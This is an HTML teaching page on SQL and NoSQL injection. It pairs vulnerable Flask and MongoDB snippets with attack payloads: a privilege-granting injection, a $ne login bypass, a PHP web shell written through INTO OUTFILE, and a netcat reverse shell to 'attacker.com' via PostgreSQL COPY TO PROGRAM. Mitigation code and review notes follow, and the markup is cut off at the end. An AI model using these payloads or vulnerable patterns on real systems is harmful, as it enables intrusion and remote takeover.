<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SQL/NoSQL Injection Exploitation Lab</title>
<!-- NOTE(review): the two assets below are fetched from third-party CDNs with no
     Subresource Integrity check. The Tailwind URL carries no version, so the script
     it serves can change without notice; Tailwind documents this CDN build as a
     development aid. Outside a local demo, serve a built stylesheet from your own origin. -->
<script src="https://cdn.tailwindcss.com"></script>
<!-- NOTE(review): this URL is version-pinned, so it can carry
     integrity="sha384-<HASH_PLACEHOLDER>" crossorigin="anonymous"; compute the hash
     from the exact file that was reviewed. -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
  /* Terminal window: dark monospace panel that scrolls sideways on overflow. */
  .terminal {
    position: relative;
    overflow-x: auto;
    padding: 1.5rem;
    border-radius: 0.5rem;
    color: #f8f8f2;
    background-color: #1e1e1e;
    font-family: 'Courier New', monospace;
  }

  /* Title bar holding the three window dots and the prompt path. */
  .terminal-header {
    display: flex;
    align-items: center;
    padding: 0.5rem 1rem;
    border-top-left-radius: 0.5rem;
    border-top-right-radius: 0.5rem;
    background-color: #2d2d2d;
  }

  /* Window dots: one shared shape, three colours. */
  .terminal-dot {
    margin-right: 6px;
    border-radius: 50%;
    height: 12px;
    width: 12px;
  }
  .terminal-red {
    background-color: #ff5f56;
  }
  .terminal-yellow {
    background-color: #ffbd2e;
  }
  .terminal-green {
    background-color: #27c93f;
  }

  /* Block cursor shown after the typed prompt text. */
  .terminal-cursor {
    display: inline-block;
    height: 16px;
    width: 8px;
    background-color: #f8f8f2;
    animation: blink 1s infinite;
  }

  @keyframes blink {
    0%, 100% {
      opacity: 1;
    }
    50% {
      opacity: 0;
    }
  }

  /* Snippet panels used inside the cards. */
  .code-block {
    position: relative;
    overflow-x: auto;
    padding: 1rem;
    border-radius: 0.5rem;
    color: #f8f8f2;
    background-color: #2d2d2d;
    font-family: 'Courier New', monospace;
  }

  /* Tab panes stay hidden until they carry the .active class. */
  .tab-content {
    display: none;
  }
  .tab-content.active {
    animation: fadeIn 0.3s ease-in-out;
    display: block;
  }

  @keyframes fadeIn {
    from {
      opacity: 0;
    }
    to {
      opacity: 1;
    }
  }

  /* Cards lift slightly on hover. */
  .attack-card {
    transition: all 0.3s ease;
  }
  .attack-card:hover {
    box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
    transform: translateY(-5px);
  }

  /* Generic helper that reuses the cursor's blink animation. */
  .blink {
    animation: blink 1s infinite;
  }
</style>
</head>
<body class="bg-gray-900 text-gray-100 min-h-screen">
<div class="container mx-auto px-4 py-8">
<!-- Terminal Header: decorative window bar, a prompt line and an output area.
     .typing-text and #terminal-output are empty in the markup; presumably they are
     filled by script that is not visible in this part of the file. -->
<div class="terminal mb-8">
  <!-- Window bar: three dots followed by the prompt path -->
  <div class="terminal-header">
    <div class="terminal-dot terminal-red"></div>
    <div class="terminal-dot terminal-yellow"></div>
    <div class="terminal-dot terminal-green"></div>
    <div class="ml-2 text-sm">pentester@secure-lab:~/sql_injection/_</div>
  </div>
  <!-- Prompt line with blinking cursor, then the output container -->
  <div class="mt-2">
    <div class="text-green-400">$ <span class="typing-text"></span><span class="terminal-cursor"></span></div>
    <div id="terminal-output" class="mt-4"></div>
  </div>
</div>
<!-- Main Content -->
<div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12">
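<!-- Privilege Escalation Card: two illustrative injection patterns (SQL, NoSQL).
     Snippet text that contains angle brackets is written with &lt; and &gt;;
     left raw, the browser parses it as an unknown element and the route
     pattern never appears on the page. -->
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
  <div class="p-6">
    <div class="flex items-center mb-4">
      <div class="bg-red-900 p-3 rounded-full mr-4">
        <i class="fas fa-user-shield text-red-400 text-xl"></i>
      </div>
      <h2 class="text-2xl font-bold text-white">Privilege Escalation</h2>
    </div>
    <div class="mb-6">
      <h3 class="text-lg font-semibold text-gray-300 mb-3">SQL Injection</h3>
      <div class="code-block mb-2">
        <span class="text-gray-400"># Vulnerable Flask endpoint</span><br>
        @app.route('/user/&lt;int:user_id&gt;')<br>
        def get_user(user_id):<br>
        query = f"SELECT * FROM users WHERE id = {user_id}"<br>
        result = db.execute(query)<br>
        return jsonify(result.fetchall())<br><br>
        <span class="text-gray-400"># Attack payload:</span><br>
        /user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--<br><br>
        <span class="text-gray-400"># Note: Flask's int converter matches digits only, so this exact route answers 404 to the path above.</span><br>
        <span class="text-gray-400"># The unsafe part is the f-string: bind the value as a query parameter even when the route is typed.</span><br>
        <span class="text-gray-400"># Note: the GRANT can only succeed if the application's database account may grant privileges;</span><br>
        <span class="text-gray-400"># run the application under a least-privilege account.</span>
      </div>
    </div>
    <div class="mb-6">
      <h3 class="text-lg font-semibold text-gray-300 mb-3">NoSQL Injection</h3>
      <div class="code-block mb-2">
        <span class="text-gray-400">// Vulnerable MongoDB query</span><br>
        db.users.find({<br>
        username: req.body.username,<br>
        password: req.body.password<br>
        });<br><br>
        <span class="text-gray-400">// Attack payload (JSON):</span><br>
        {<br>
        "username": {"$ne": null},<br>
        "password": {"$ne": null}<br>
        }<br><br>
        <span class="text-gray-400">// Note: a JSON body can deliver objects where strings are expected, and the driver reads them as query operators.</span><br>
        <span class="text-gray-400">// Require both fields to be strings before building the query.</span>
      </div>
    </div>
  </div>
</div>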
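<!-- Command Execution Card: illustrative payloads for MySQL and PostgreSQL, each
     followed by the server-side preconditions a defender can remove.
     Angle brackets inside snippet text are written as &lt; and &gt;; left raw,
     the browser treats them as markup and the text is not displayed. -->
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
  <div class="p-6">
    <div class="flex items-center mb-4">
      <div class="bg-blue-900 p-3 rounded-full mr-4">
        <i class="fas fa-terminal text-blue-400 text-xl"></i>
      </div>
      <h2 class="text-2xl font-bold text-white">Command Execution</h2>
    </div>
    <div class="mb-6">
      <h3 class="text-lg font-semibold text-gray-300 mb-3">MySQL Command Execution</h3>
      <div class="code-block mb-2">
        <span class="text-gray-400">-- Enable command execution</span><br>
        SELECT * FROM users WHERE id = 1;<br>
        SELECT sys_exec('whoami'); --<br><br>
        <span class="text-gray-400">-- Writing web shell</span><br>
        SELECT '&lt;?php system($_GET["cmd"]); ?&gt;'<br>
        INTO OUTFILE '/var/www/html/shell.php'; --<br><br>
        <span class="text-gray-400">-- Note: sys_exec is not built into MySQL; it exists only where a UDF library providing it was installed.</span><br>
        <span class="text-gray-400">-- Note: INTO OUTFILE needs the FILE privilege and a target path permitted by secure_file_priv.</span><br>
        <span class="text-gray-400">-- Defence: no FILE privilege for the application account, secure_file_priv restricted (or NULL),</span><br>
        <span class="text-gray-400">-- and a web root the database service account cannot write to.</span>
      </div>
    </div>
    <div class="mb-6">
      <h3 class="text-lg font-semibold text-gray-300 mb-3">PostgreSQL Exploitation</h3>
      <div class="code-block mb-2">
        <span class="text-gray-400"># Vulnerable Flask code</span><br>
        @app.route('/search')<br>
        def search():<br>
        query = request.args.get('q')<br>
        sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"<br>
        return execute_query(sql)<br><br>
        <span class="text-gray-400"># Attack payload:</span><br>
        /search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --<br><br>
        <span class="text-gray-400"># Note: COPY ... TO PROGRAM runs only for superusers or members of pg_execute_server_program;</span><br>
        <span class="text-gray-400"># the application role should be neither.</span><br>
        <span class="text-gray-400"># Defence: pass the search term as a bound parameter and build the LIKE pattern from that parameter.</span>
      </div>
    </div>
  </div>
</div>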
</div>
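<!-- Mitigation Section: safe counterparts to the vulnerable snippets shown in the cards.
     Changes against the earlier markup:
     * the Flask route pattern is HTML-escaped so the browser displays it;
     * the NoSQL example type-checks the password as well as the username;
     * re.escape() is removed: the lookup is an exact match, not a regex, so escaping
       gave no protection and changed valid usernames (constructed example:
       "john.doe" became "john\.doe"). -->
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden mb-12">
  <div class="p-6">
    <h2 class="text-2xl font-bold text-white mb-6">Secure Mitigation Strategies</h2>
    <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
      <div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
        <div class="flex items-center mb-3">
          <i class="fas fa-shield-alt text-green-400 mr-3"></i>
          <h3 class="text-lg font-semibold text-white">SQLAlchemy ORM</h3>
        </div>
        <div class="code-block text-sm">
          <span class="text-gray-400"># SECURE: Using SQLAlchemy ORM</span><br>
          <span class="text-gray-400"># The ORM sends user_id as a bound parameter, never as part of the SQL text.</span><br>
          @app.route('/user/&lt;int:user_id&gt;')<br>
          def get_user_secure(user_id):<br>
          user = User.query.filter_by(id=user_id).first()<br>
          if user:<br>
          <span class="text-gray-400"># Return named fields only, not the whole row</span><br>
          return jsonify({<br>
          'id': user.id,<br>
          'username': user.username<br>
          })<br>
          return jsonify({'error': 'User not found'}), 404
        </div>
      </div>
      <div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
        <div class="flex items-center mb-3">
          <i class="fas fa-lock text-green-400 mr-3"></i>
          <h3 class="text-lg font-semibold text-white">NoSQL Injection Prevention</h3>
        </div>
        <div class="code-block text-sm">
          <span class="text-gray-400"># SECURE: NoSQL injection prevention</span><br>
          def authenticate_user_secure(username, password):<br>
          <span class="text-gray-400"># Reject anything that is not a plain string, so operator objects never reach the query</span><br>
          if not isinstance(username, str) or not isinstance(password, str):<br>
          return None<br>
          <span class="text-gray-400"># Exact-match lookup: the username is passed unchanged, no regex escaping</span><br>
          user = db.users.find_one({<br>
          'username': username,<br>
          'password': hash_password(password)<br>
          })<br>
          <span class="text-gray-400"># Note: matching on the hash inside the query works only with an unsalted hash (hash_password is not shown here).</span><br>
          <span class="text-gray-400"># With a salted scheme, look the user up by username and verify the password in application code.</span><br>
          return user
        </div>
      </div>
    </div>
  </div>
</div>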
<!-- Advanced Defenses -->
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden">
<
</html>